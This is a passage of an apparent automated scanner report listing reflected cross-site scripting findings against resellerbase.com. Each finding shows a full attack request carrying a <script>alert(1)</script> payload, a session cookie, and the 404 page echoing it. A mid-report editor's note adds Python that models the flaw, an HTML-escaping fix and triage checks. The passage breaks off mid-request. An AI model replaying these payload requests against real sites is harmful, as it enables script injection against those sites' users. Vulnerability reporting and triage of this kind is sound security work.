<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating/0.gifc1640<script>alert(1)</script>8cc1c11f293 was not found on this server.</p>
...[SNIP]...

2.2313. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f40d<script>alert(1)</script>9303622313c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating/0.gif?3f40d<script>alert(1)</script>9303622313c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating/0.gif?3f40d<script>alert(1)</script>9303622313c=1 was not found on this server.</p>
...[SNIP]...

2.2314. http://www.resellerbase.com/detail/34/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa546<script>alert(1)</script>88bcc7a6084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa546<script>alert(1)</script>88bcc7a6084/34/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa546<script>alert(1)</script>88bcc7a6084/34/ was not found on this server.</p>
...[SNIP]...
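
Editor's note with an added example (this code is not from the XSS.CX report, from Burp, or from the resellerbase.com site). Every "REST URL parameter" and "arbitrarily supplied request parameter" finding in this run has the same sink: the site's 404 page writes the requested URI back into a <p> element without HTML-encoding it, so a payload anywhere in the path or query string is reflected. Two checks matter before accepting the scanner's per-parameter count at face value. First, the findings collapse to one root cause, which is what a fix should target. Second, the scanner sent literal < and > in the request line; a browser percent-encodes those characters in a URL before sending, so whether a victim's browser actually triggers this depends on whether the handler decodes the URI before echoing it, and the finding should be re-tested in that form. The 404 handler's source is not on the page, so the vulnerable renderer below is an assumed stand-in whose shape is inferred from the quoted responses; the request targets are the ones quoted in the report, and the bodies are generated locally, not captured.

```python
"""Added example: model the single sink behind the report's reflected-XSS
findings, its hardened form, and two triage checks. Not the site's code."""
import html
import re
from urllib.parse import quote

# Constructed stand-in for the site's 404 handler (shape inferred from the
# responses quoted in the report; the real source is not on the page).
def render_404_vulnerable(request_uri: str) -> str:
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {request_uri} was not found on this server.</p>")

# Hardened form: encode for the HTML text context the value lands in.
def render_404_fixed(request_uri: str) -> str:
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {html.escape(request_uri, quote=True)} "
            "was not found on this server.</p>")

def as_browser_sends(uri: str) -> str:
    """Approximation of what a browser puts on the wire: '<' and '>' become
    %3C and %3E, while / ? = & ( ) and unreserved characters stay as they are."""
    return quote(uri, safe="/?=&()")

def classify_reflection(body: str, payload: str) -> str:
    """How the payload came back: 'unencoded' (exploitable in a text context),
    'encoded' (HTML entities; safe here), 'percent-encoded' (the %3C form a
    browser sends; not exploitable unless the server decodes before echoing),
    or 'absent'."""
    if payload in body:
        return "unencoded"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    if quote(payload, safe="/()") in body:
        return "percent-encoded"
    return "absent"

SINK_RE = re.compile(r"<p>The requested URL (.*?) was not found on this server\.</p>", re.S)

def distinct_sinks(findings):
    """findings: iterable of (request_line, response_body). Returns the set of
    sink descriptions; a set of size 1 means the per-parameter findings share
    one root cause and need one fix."""
    sinks = set()
    for request_line, body in findings:
        target = request_line.split(" ")[1]          # "GET /path HTTP/1.1"
        m = SINK_RE.search(body)
        if m and m.group(1) == target:
            sinks.add("404 page echoes REQUEST_URI unencoded")
        else:
            sinks.add("other: " + request_line)
    return sinks

# Request targets quoted in the report; bodies produced by the stand-in above.
REPORT_TARGETS = [
    "/detailaa546<script>alert(1)</script>88bcc7a6084/34/",
    "/detail/344005f<script>alert(1)</script>ede5df7ac09/",
    "/detail/34/?b0059<script>alert(1)</script>6bab41b87dd=1",
    "/detail/34/rating.php?435f3<script>alert(1)</script>1770c27ee92=1",
]
FINDINGS = [(f"GET {t} HTTP/1.1", render_404_vulnerable(t)) for t in REPORT_TARGETS]
PAYLOAD = "aa546<script>alert(1)</script>88bcc7a6084"

if __name__ == "__main__":
    print(distinct_sinks(FINDINGS))
    print("raw request    :", classify_reflection(render_404_vulnerable(REPORT_TARGETS[0]), PAYLOAD))
    print("after fix      :", classify_reflection(render_404_fixed(REPORT_TARGETS[0]), PAYLOAD))
    print("browser request:", classify_reflection(
        render_404_vulnerable(as_browser_sends(REPORT_TARGETS[0])), PAYLOAD))
```

Run it with python3 to see the three classifications side by side. The point of the last one is the caveat above: a handler that echoes the raw, still percent-encoded request URI is not exploitable from a browser, whereas one that echoes a decoded copy is; only a re-test against the live target settles which applies here.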

2.2315. http://www.resellerbase.com/detail/34/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4005f<script>alert(1)</script>ede5df7ac09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/344005f<script>alert(1)</script>ede5df7ac09/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/344005f<script>alert(1)</script>ede5df7ac09/ was not found on this server.</p>
...[SNIP]...

2.2316. http://www.resellerbase.com/detail/34/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0059<script>alert(1)</script>6bab41b87dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/?b0059<script>alert(1)</script>6bab41b87dd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/?b0059<script>alert(1)</script>6bab41b87dd=1 was not found on this server.</p>
...[SNIP]...

2.2317. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec075<script>alert(1)</script>23a5a7ba6a7db7cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailec075<script>alert(1)</script>23a5a7ba6a7db7cd7/34/rating.php?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailec075<script>alert(1)</script>23a5a7ba6a7db7cd7/34/rating.php?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2318. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f09b<script>alert(1)</script>f5de29211c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4f09b<script>alert(1)</script>f5de29211c2/34/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4f09b<script>alert(1)</script>f5de29211c2/34/rating.php was not found on this server.</p>
...[SNIP]...

2.2319. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 296f8<script>alert(1)</script>bfc6c2579f949b04e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34296f8<script>alert(1)</script>bfc6c2579f949b04e/rating.php?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34296f8<script>alert(1)</script>bfc6c2579f949b04e/rating.php?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2320. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6822<script>alert(1)</script>e2443225fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34b6822<script>alert(1)</script>e2443225fa5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34b6822<script>alert(1)</script>e2443225fa5/rating.php was not found on this server.</p>
...[SNIP]...

2.2321. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69f43<script>alert(1)</script>e49b6c64318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/rating.php69f43<script>alert(1)</script>e49b6c64318 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php69f43<script>alert(1)</script>e49b6c64318 was not found on this server.</p>
...[SNIP]...

2.2322. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9ff1<script>alert(1)</script>a1369ea7bb690e8ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34/rating.phpc9ff1<script>alert(1)</script>a1369ea7bb690e8ad?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.phpc9ff1<script>alert(1)</script>a1369ea7bb690e8ad?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2323. http://www.resellerbase.com/detail/34/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 435f3<script>alert(1)</script>1770c27ee92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/rating.php?435f3<script>alert(1)</script>1770c27ee92=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php?435f3<script>alert(1)</script>1770c27ee92=1 was not found on this server.</p>
...[SNIP]...

2.2324. http://www.resellerbase.com/detail/34/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61b83<script>alert(1)</script>863c139be3a449b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34/rating.php/61b83<script>alert(1)</script>863c139be3a449b7c?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php/61b83<script>alert(1)</script>863c139be3a449b7c?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2325. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 643e9<script>alert(1)</script>9b8da8b7c5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail643e9<script>alert(1)</script>9b8da8b7c5b/34/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail643e9<script>alert(1)</script>9b8da8b7c5b/34/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2326. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40e79<script>alert(1)</script>5e8a65d8c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3440e79<script>alert(1)</script>5e8a65d8c56/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3440e79<script>alert(1)</script>5e8a65d8c56/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2327. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 145b2<script>alert(1)</script>950f85ae605 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/search.php145b2<script>alert(1)</script>950f85ae605?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php145b2<script>alert(1)</script>950f85ae605?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2328. http://www.resellerbase.com/detail/34/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d34f5<a>de8b9fa317f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Searchd34f5<a>de8b9fa317f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Searchd34f5<a>de8b9fa317f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2329. http://www.resellerbase.com/detail/34/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9e0fd<a>67e6f7e5a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...9e0fd<a>67e6f7e5a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
